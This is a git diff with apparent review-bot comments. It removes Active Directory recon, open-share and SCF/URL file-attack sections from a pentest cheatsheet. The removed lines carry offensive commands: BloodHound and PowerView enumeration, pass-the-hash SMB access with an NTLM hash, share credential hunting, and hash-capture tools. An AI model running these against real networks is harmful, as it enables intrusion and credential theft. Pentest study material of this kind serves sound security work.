diff --git a/docs/README.md b/docs/README.md
index c9add6a..7440f75 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -1,4 +1,4 @@
-# đź“• InternalAllTheThings
+# InternalAllTheThings
Active Directory and Internal Pentest Cheatsheets
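Review bot: The removed heading text `# đź“•` looks like a UTF-8 emoji that was mis-decoded as a single-byte code page, so dropping it is reasonable, but the same mojibake survives in the unchanged `đź“– Documentation` heading a few lines further down; either restore both as proper UTF-8 or remove both in this commit so the README renders consistently.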
@@ -11,10 +11,17 @@ Active Directory and Internal Pentest Cheatsheets
đź“– Documentation
-----
-TODO
+* Feel free to update any pages with your knowledge by submitting a Pull Request
+* Content in this repository is provided as is, for learning purpose. The author and contributors take no responsibility if you break something.
👨‍💻 Contributions
-----
-TODO
\ No newline at end of file
+
+
+
+
+
+
+Thanks again for your contribution! :heart:
\ No newline at end of file
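Review bot: The six empty `+` lines added between the Contributions `-----` rule and `Thanks again for your contribution! :heart:` are just padding; one blank line is enough, and the file is still written without a trailing newline (`\ No newline at end of file` on both sides), which is worth fixing while the file is being touched. Two small wording points in the new Documentation bullets: `for learning purpose` should read `for learning purposes`, and the second bullet is a liability statement rather than documentation, so it sits better under the Contributions heading next to the pull-request note.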
diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md
index 4336bc3..8524009 100644
--- a/docs/active-directory/Active Directory Attack.md
+++ b/docs/active-directory/Active Directory Attack.md
@@ -6,29 +6,12 @@
- [Summary](#summary)
- [Tools](#tools)
- [Kerberos Clock Synchronization](#kerberos-clock-synchronization)
- - [Active Directory Recon](#active-directory-recon)
- - [Using BloodHound](#using-bloodhound)
- - [Using PowerView](#using-powerview)
- - [Using AD Module](#using-ad-module)
- [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc)
- [MS14-068 Checksum Validation](#ms14-068-checksum-validation)
- [ZeroLogon](#zerologon)
- [PrintNightmare](#printnightmare)
- [samAccountName spoofing](#samaccountname-spoofing)
- - [Open Shares](#open-shares)
- - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
- - [SCF Files](#scf-files)
- - [URL Files](#url-files)
- - [Windows Library Files](#windows-library-files)
- - [Windows Search Connectors Files](#windows-search-connectors-files)
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
- - [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
- - [Find vulnerable GPO](#find-vulnerable-gpo)
- - [Abuse GPO with SharpGPOAbuse](#abuse-gpo-with-sharpgpoabuse)
- - [Abuse GPO with PowerGPOAbuse](#abuse-gpo-with-powergpoabuse)
- - [Abuse GPO with pyGPOAbuse](#abuse-gpo-with-pygpoabuse)
- - [Abuse GPO with PowerView](#abuse-gpo-with-powerview)
- - [Abuse GPO with StandIn](#abuse-gpo-with-standin)
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
- [DCSync Attack](#dcsync-attack)
- [Volume Shadow Copy](#volume-shadow-copy)
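Review bot: No forwarding link replaces the removed Active Directory Recon, Open Shares, SCF/URL file attack and GPO abuse entries; if those sections moved to their own pages, the TOC should link there so readers who use this index as the entry point can still find them, and any in-body links to anchors such as `#using-bloodhound` or `#find-vulnerable-gpo` need to be updated in the same change. While editing the TOC, the unchanged `#passwords-in-sysvol-&-group-policy-preferences` anchor will not match the slug GitHub generates for that heading (the `&` is stripped, giving `#passwords-in-sysvol--group-policy-preferences`), so that link is currently dead.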
@@ -37,27 +20,6 @@
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
- [User Hunting](#user-hunting)
- - [Password spraying](#password-spraying)
- - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
- - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list)
- - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service)
- - [BadPwdCount attribute](#badpwdcount-attribute)
- - [Password in AD User comment](#password-in-ad-user-comment)
- - [Password of Pre-Created Computer Account](#password-of-pre-created-computer-account)
- - [Reading LAPS Password](#reading-laps-password)
- - [Reading GMSA Password](#reading-gmsa-password)
- - [Forging Golden GMSA](#forging-golden-gmsa)
- - [Kerberos Tickets](#kerberos-tickets)
- - [Dump Kerberos Tickets](#dump-kerberos-tickets)
- - [Replay Kerberos Tickets](#replay-kerberos-tickets)
- - [Convert Kerberos Tickets](#convert-kerberos-tickets)
- - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
- - [Using Mimikatz](#using-mimikatz)
- - [Using Meterpreter](#using-meterpreter)
- - [Using a ticket on Linux](#using-a-ticket-on-linux)
- - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
- - [Pass-the-Ticket Diamond Tickets](#pass-the-ticket-diamond-tickets)
- - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets)
- [Kerberoasting](#kerberoasting)
- [KRB_AS_REP Roasting](#krb_as_rep-roasting)
- [Kerberoasting w/o domain account](#kerberoasting-wo-domain-account)
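Review bot: The Password spraying, BadPwdCount, LAPS/GMSA and Kerberos Tickets (dump, replay, convert, Golden/Silver/Diamond/Sapphire) entries are removed here with no pointer to where that material now lives; these are among the most-linked sections of the page, so either add a single TOC entry linking to the new location or state explicitly in the PR description that the content is being dropped rather than moved.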
@@ -79,25 +41,8 @@
- [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay)
- [DNS Poisonning - Relay delegation with mitm6](#dns-poisonning---relay-delegation-with-mitm6)
- [Relaying with WebDav Trick](#relaying-with-webdav-trick)
- - [Active Directory Certificate Services](#active-directory-certificate-services)
- - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
- - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
- - [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates)
- - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
- - [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
- - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
- - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- - [ESC9 - No Security Extension](#esc9---no-security-extension)
- - [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr)
- - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
- - [Pass-The-Certificate](#pass-the-certificate)
- [UnPAC The Hash](#unpac-the-hash)
- [Shadow Credentials](#shadow-credentials)
- - [Active Directory Groups](#active-directory-groups)
- - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- - [Abusing DNS Admins Group](#abusing-dns-admins-group)
- - [Abusing Schema Admins Group](#abusing-schema-admins-group)
- - [Abusing Backup Operators Group](#abusing-backup-operators-group)
- [Active Directory Federation Services](#active-directory-federation-services)
- [ADFS - Golden SAML](#adfs---golden-saml)
- [Active Directory Integrated DNS](#active-directory-integrated-dns)
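Review bot: Removing the whole Active Directory Certificate Services block (ESC1 through ESC11, Certifried, Pass-The-Certificate) and the Active Directory Groups block leaves `UnPAC The Hash` and `Shadow Credentials` as top-level siblings of `Active Directory Federation Services` with no ADCS parent; if the ADCS content moves to its own page, one top-level entry pointing there would keep the TOC structure readable, and the in-body cross references from the UnPAC and Shadow Credentials sections to the certificate sections should be checked for dead anchors.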
@@ -110,10 +55,6 @@
- [ReadLAPSPassword](#readlapspassword)
- [ReadGMSAPassword](#readgmsapassword)
- [ForceChangePassword](#forcechangepassword)
- - [DCOM Exploitation](#dcom-exploitation)
- - [DCOM via MMC Application Class](#dcom-via-mmc-application-class)
- - [DCOM via Excel](#dcom-via-excel)
- - [DCOM via ShellExecute](#dcom-via-shellexecute)
- [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
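Review bot: The DCOM Exploitation entries (MMC Application Class, Excel, ShellExecute) are deleted without a replacement link; please apply the same treatment as the other moved sections, and confirm the `ReadLAPSPassword` / `ReadGMSAPassword` context entries still resolve, since the sibling `Reading LAPS Password` / `Reading GMSA Password` sections they relate to were removed from the TOC in an earlier hunk.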
@@ -127,24 +68,9 @@
- [S4U2self - Privilege Escalation](#s4u2self---privilege-escalation)
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
- [PrivExchange attack](#privexchange-attack)
- - [SCCM Deployment](#sccm-deployment)
- - [SCCM Network Access Accounts](#sccm-network-access-accounts)
- - [SCCM Shares](#sccm-shares)
- - [WSUS Deployment](#wsus-deployment)
- - [RODC - Read Only Domain Controller](#rodc---read-only-domain-controller)
- - [RODC Golden Ticket](#rodc-golden-ticket)
- - [RODC Key List Attack](#rodc-key-list-attack)
- - [RODC Computer Object](#rodc-computer-object)
- [PXE Boot image attack](#pxe-boot-image-attack)
- [DSRM Credentials](#dsrm-credentials)
- [DNS Reconnaissance](#dns-reconnaissance)
- - [Linux Active Directory](#linux-active-directory)
- - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp)
- - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring)
- - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm)
- - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab)
- - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
- - [Extract accounts from /etc/sssd/sssd.conf](#extract-accounts-from-etcsssdsssdconf)
- [References](#references)
## Tools
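Review bot: Please state in the PR description where the SCCM, WSUS, RODC and Linux Active Directory (CCACHE reuse from /tmp, keyring, SSSD KCM and keytab, plus the /etc/krb5.keytab and /etc/sssd/sssd.conf extraction) sections moved; this hunk only deletes their TOC entries, and the hunk headers across the file show the TOC shrinking by roughly sixty lines with no corresponding additions anywhere in the diff.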
@@ -259,286 +185,6 @@ In Kerberos, time is used to ensure that tickets are valid. To achieve this, the
```
-## Active Directory Recon
-
-### Using BloodHound
-
-Use the correct collector
-* AzureHound for Azure Active Directory
-* SharpHound for local Active Directory
-* RustHound for local Active Directory
-
-* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
-
-* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
- ```powershell
- # run the collector on the machine using SharpHound.exe
- # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
- # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
- .\SharpHound.exe -c all -d active.htb --searchforest
- .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
- .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
-
- .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder
- .\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb
- .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
-
- # or run the collector on the machine using Powershell
- # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
- # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
- Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
- Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory
-
- # or remotely via BloodHound Python
- # https://github.com/fox-it/BloodHound.py
- pip install bloodhound
- bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
-
- # or locally/remotely from an ADExplorer snapshot from SysInternals (ADExplorer remains a legitimate binary signed by Microsoft, avoiding detection with security solutions)
- # https://github.com/c3c/ADExplorerSnapshot.py
- pip3 install --user .
- ADExplorerSnapshot.py -o <*.json output folder path>
- ```
-* Collect more data for certificates exploitation using Certipy
- ```ps1
- certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
- certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound
- certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123
- ```
-* use [OPENCYBER-FR/RustHound](https://github.com/OPENCYBER-FR/RustHound)
- ```ps1
- # Windows with GSSAPI session
- rusthound.exe -d domain.local --ldapfqdn domain
- # Windows/Linux simple bind connection username:password
- rusthound.exe -d domain.local -u user@domain.local -p Password123 -o output -z
- # Linux with username:password and ADCS module for @ly4k BloodHound version
- rusthound -d domain.local -u 'user@domain.local' -p 'Password123' -o /tmp/adcs --adcs -z
- ```
-
-Then import the zip/json files into the Neo4J database and query them.
-
-```powershell
-root@payload$ apt install bloodhound
-
-# start BloodHound and the database
-root@payload$ neo4j console
-# or use docker
-root@payload$ docker run -itd -p 7687:7687 -p 7474:7474 --env NEO4J_AUTH=neo4j/bloodhound -v $(pwd)/neo4j:/data neo4j:4.4-community
-
-root@payload$ ./bloodhound --no-sandbox
-Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
-```
-
-NOTE: Currently BloodHound Community Edition is still a work in progress, it is highly recommended to stay on the original [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound/) version.
-
-```ps1
-git clone https://github.com/SpecterOps/BloodHound
-cd examples/docker-compose/
-cat docker-compose.yml | docker compose -f - up
-# UI: http://localhost:8080/ui/login
-# Username: admin
-# Password: see your Docker logs
-```
-
-
-You can add some custom queries like :
-* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
-* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
-* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
-* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json)
-
-Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
-
-
-### Using PowerView
-
-- **Get Current Domain:** `Get-NetDomain`
-- **Enum Other Domains:** `Get-NetDomain -Domain `
-- **Get Domain SID:** `Get-DomainSID`
-- **Get Domain Policy:**
- ```powershell
- Get-DomainPolicy
-
- #Will show us the policy configurations of the Domain about system access or kerberos
- (Get-DomainPolicy)."system access"
- (Get-DomainPolicy)."kerberos policy"
- ```
-- **Get Domain Controlers:**
- ```powershell
- Get-NetDomainController
- Get-NetDomainController -Domain
- ```
-- **Enumerate Domain Users:**
- ```powershell
- Get-NetUser
- Get-NetUser -SamAccountName
- Get-NetUser | select cn
- Get-UserProperty
-
- #Check last password change
- Get-UserProperty -Properties pwdlastset
-
- #Get a specific "string" on a user's attribute
- Find-UserField -SearchField Description -SearchTerm "wtver"
-
- #Enumerate user logged on a machine
- Get-NetLoggedon -ComputerName
-
- #Enumerate Session Information for a machine
- Get-NetSession -ComputerName
-
- #Enumerate domain machines of the current/specified domain where specific users are logged into
- Find-DomainUserLocation -Domain | Select-Object UserName, SessionFromName
- ```
-- **Enum Domain Computers:**
- ```powershell
- Get-NetComputer -FullData
- Get-DomainGroup
-
- #Enumerate Live machines
- Get-NetComputer -Ping
- ```
-- **Enum Groups and Group Members:**
- ```powershell
- Get-NetGroupMember -GroupName "" -Domain
-
- #Enumerate the members of a specified group of the domain
- Get-DomainGroup -Identity | Select-Object -ExpandProperty Member
-
- #Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
- Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
- ```
-- **Enumerate Shares**
- ```powershell
- #Enumerate Domain Shares
- Find-DomainShare
-
- #Enumerate Domain Shares the current user has access
- Find-DomainShare -CheckShareAccess
- ```
-- **Enum Group Policies:**
- ```powershell
- Get-NetGPO
-
- # Shows active Policy on specified machine
- Get-NetGPO -ComputerName
- Get-NetGPOGroup
-
- #Get users that are part of a Machine's local Admin group
- Find-GPOComputerAdmin -ComputerName
- ```
-- **Enum OUs:**
- ```powershell
- Get-NetOU -FullData
- Get-NetGPO -GPOname
- ```
-- **Enum ACLs:**
- ```powershell
- # Returns the ACLs associated with the specified account
- Get-ObjectAcl -SamAccountName -ResolveGUIDs
- Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
-
- #Search for interesting ACEs
- Invoke-ACLScanner -ResolveGUIDs
-
- #Check the ACLs associated with a specified path (e.g smb share)
- Get-PathAcl -Path "\\Path\Of\A\Share"
- ```
-- **Enum Domain Trust:**
- ```powershell
- Get-NetDomainTrust
- Get-NetDomainTrust -Domain
- ```
-- **Enum Forest Trust:**
- ```powershell
- Get-NetForestDomain
- Get-NetForestDomain Forest
-
- #Domains of Forest Enumeration
- Get-NetForestDomain
- Get-NetForestDomain Forest
-
- #Map the Trust of the Forest
- Get-NetForestTrust
- Get-NetDomainTrust -Forest
- ```
-- **User Hunting:**
- ```powershell
- #Finds all machines on the current domain where the current user has local admin access
- Find-LocalAdminAccess -Verbose
-
- #Find local admins on all machines of the domain:
- Invoke-EnumerateLocalAdmin -Verbose
-
- #Find computers were a Domain Admin OR a specified user has a session
- Invoke-UserHunter
- Invoke-UserHunter -GroupName "RDPUsers"
- Invoke-UserHunter -Stealth
-
- #Confirming admin access:
- Invoke-UserHunter -CheckAccess
- ```
- :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \
- I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him ->
- Profit!
-
- [PowerView 3.0 Tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
-
-### Using AD Module
-
-- **Get Current Domain:** `Get-ADDomain`
-- **Enum Other Domains:** `Get-ADDomain -Identity `
-- **Get Domain SID:** `Get-DomainSID`
-- **Get Domain Controlers:**
-
- ```powershell
- Get-ADDomainController
- Get-ADDomainController -Identity
- ```
-
-- **Enumerate Domain Users:**
- ```powershell
- Get-ADUser -Filter * -Identity -Properties *
-
- #Get a specific "string" on a user's attribute
- Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
- ```
-- **Enum Domain Computers:**
- ```powershell
- Get-ADComputer -Filter * -Properties *
- Get-ADGroup -Filter *
- ```
-- **Enum Domain Trust:**
- ```powershell
- Get-ADTrust -Filter *
- Get-ADTrust -Identity
- ```
-- **Enum Forest Trust:**
- ```powershell
- Get-ADForest
- Get-ADForest -Identity
-
- #Domains of Forest Enumeration
- (Get-ADForest).Domains
- ```
- - **Enum Local AppLocker Effective Policy:**
- ```powershell
- Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
- ```
-
-### Other Interesting Commands
-
-- **Find Domain Controllers**
- ```ps1
- nslookup domain.com
- nslookup -type=srv _ldap._tcp.dc._msdcs..com
- nltest /dclist:domain.com
- Get-ADDomainController -filter * | Select-Object name
- gpresult /r
- $Env:LOGONSERVER
- echo %LOGONSERVER%
- ```
-
## From CVE to SYSTEM shell on DC
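Review bot: The entire Active Directory Recon section (BloodHound, PowerView, AD Module, Other Interesting Commands) is deleted in one hunk with no `+` side anywhere in this diff; if it was moved to a separate file under `docs/active-directory/` (the file name is not in the diff), that file should be part of the same PR so the docs are consistent at this commit, and a one-line pointer in place of the deleted block would stop the Kerberos Clock Synchronization section from running straight into `## From CVE to SYSTEM shell on DC`. Removed lines are not reviewed as such, but if the text is relocated, fix the inconsistent neo4j credentials on the way (`NEO4J_AUTH=neo4j/bloodhound` versus `user:neo4J, pass:neo4j`) and revisit the `NOTE: Currently BloodHound Community Edition is still a work in progress` remark, which no longer reflects the project's status.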
@@ -936,170 +582,6 @@ Automated exploitation:
* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041)
-## Open Shares
-
-> Some shares can be accessible without authentication, explore them to find some juicy files
-
-* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap)
- ```powershell
- smbmap -H 10.10.10.10 # null session
- smbmap -H 10.10.10.10 -R # recursive listing
- smbmap -H 10.10.10.10 -u invaliduser # guest smb session
- smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
- ```
-
-* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
- ```powershell
- pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
- pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
- ls # list files
- cd # move inside a folder
- get # download files
- put # replace a file
- ```
-
-* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
- ```powershell
- smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
- Sharename Type Comment
- --------- ---- -------
- ADMIN$ Disk Remote Admin
- C$ Disk Default share
- IPC$ IPC Remote IPC
- NETLOGON Disk Logon server share
- Replication Disk
- SYSVOL Disk Logon server share
- Users Disk
- use Sharename # select a Sharename
- cd Folder # move inside a folder
- ls # list files
- ```
-
-* [smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers](#)
- ```powershell
- smbclient -U username //10.0.0.1/SYSVOL
- smbclient //10.0.0.1/Share
-
- # Download a folder recursively
- smb: \> mask ""
- smb: \> recurse ON
- smb: \> prompt OFF
- smb: \> lcd '/path/to/go/'
- smb: \> mget *
- ```
-
-
-* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler)
- ```ps1
- snaffler.exe -s - snaffler.log
-
- # Snaffle all the computers in the domain
- ./Snaffler.exe -d domain.local -c -s
-
- # Snaffle specific computers
- ./Snaffler.exe -n computer1,computer2 -s
- ​
- # Snaffle a specific directory
- ./Snaffler.exe -i C:\ -s
- ```
-
-
-## SCF and URL file attack against writeable share
-
-Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop)
-
-```ps1
-# Farmer to receive auth
-farmer.exe [seconds] [output]
-farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
-farmer.exe 8888 60 # one minute
-
-# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks
-crop.exe
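Review bot: The diff is cut off mid-hunk here (the `crop.exe` line has no continuation), so the remainder of the `@@ -936,170 +582,6 @@` hunk could not be reviewed; please confirm that all 170 removed lines of the Open Shares and SCF/URL file attack sections are accounted for in the destination file and that a pointer replaces them, as with the recon section. If the Snaffler block is relocated, strip the line that consists only of a zero-width space (between `./Snaffler.exe -n computer1,computer2 -s` and the `# Snaffle a specific directory` comment); it is invisible in the rendered page but breaks copy-paste of the block.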